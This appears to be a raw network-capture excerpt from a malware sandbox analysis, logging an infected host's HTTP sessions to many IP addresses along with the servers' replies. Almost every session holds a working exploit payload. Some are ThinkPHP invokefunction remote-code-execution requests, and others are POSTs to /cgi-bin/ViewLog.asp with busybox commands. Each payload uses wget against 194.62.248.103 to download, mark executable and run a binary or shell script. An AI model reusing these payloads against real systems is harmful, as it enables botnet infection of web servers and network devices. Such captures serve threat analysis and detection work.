                                                        Apr 14, 2024 16:36:38.691756964 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:39.050385952 CEST315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        659192.168.2.2358660112.122.159.6580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.691987038 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:39.056106091 CEST315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        660192.168.2.235520288.6.25.4880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.751039982 CEST436INHTTP/1.1 408 Request Timeout
                                                        Server: micro_httpd
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self';default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline'
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: 'nosniff'
                                                        Date: Sun, 14 Apr 2024 16:36:45 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Apr 14, 2024 16:36:38.753644943 CEST449INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 27 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 27 20 43 4f 4e
                                                        Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE><meta HTTP-EQUIV='Cache-Control' CONTENT='no-cache'><meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request found.<HR><ADDRESS><A HREF


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        661192.168.2.234890894.122.229.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.258822918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        662192.168.2.235809894.121.52.1278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.259028912 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        663192.168.2.234031294.121.207.778080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.261117935 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        664192.168.2.235137494.123.99.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.262382030 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        665192.168.2.233874462.213.55.138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.320715904 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        666192.168.2.234108085.204.3.1078080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.594974041 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        667192.168.2.233802894.121.64.1898080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.598870039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        668192.168.2.235421294.123.120.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:40.601383924 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        669192.168.2.233299495.101.252.17180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:41.742957115 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:42.037616014 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:41 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:41 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 66 62 30 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 34 30 31 26 23 34 36 3b 31 30 31 33 36 66 63 34 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 66 62 30 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 34 30 31 26 23 34 36 3b 31 30 31 33 36 66 63 34 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cfb0f748&#46;1713105401&#46;10136fc4<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;cfb0f748&#46;1713105401&#46;10136fc4</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        670192.168.2.234432495.216.208.6880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:41.769484043 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:42.093972921 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:41 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        671192.168.2.233871895.86.123.12080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:41.800020933 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        672192.168.2.234610895.56.138.7480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:41.825730085 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:42.206929922 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:36:42.206942081 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        673192.168.2.2337162112.92.40.3380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:42.134304047 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:42.470756054 CEST346INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:42 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 204
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        674192.168.2.2353534112.125.17.11180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:42.153978109 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:42.508611917 CEST442INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:42 GMT
                                                        Server: Apache
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Content-Length: 181
                                                        Keep-Alive: timeout=15, max=300
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00
                                                        Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        675192.168.2.2350730112.196.61.7380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:42.580544949 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        676192.168.2.235367885.122.231.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.192009926 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        677192.168.2.234173831.33.140.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.269493103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:46.518959045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        678192.168.2.234580495.44.23.48080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.276247978 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:43.582638979 CEST403INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 15:36:42 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 193
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        679192.168.2.236002485.3.212.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.279397011 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
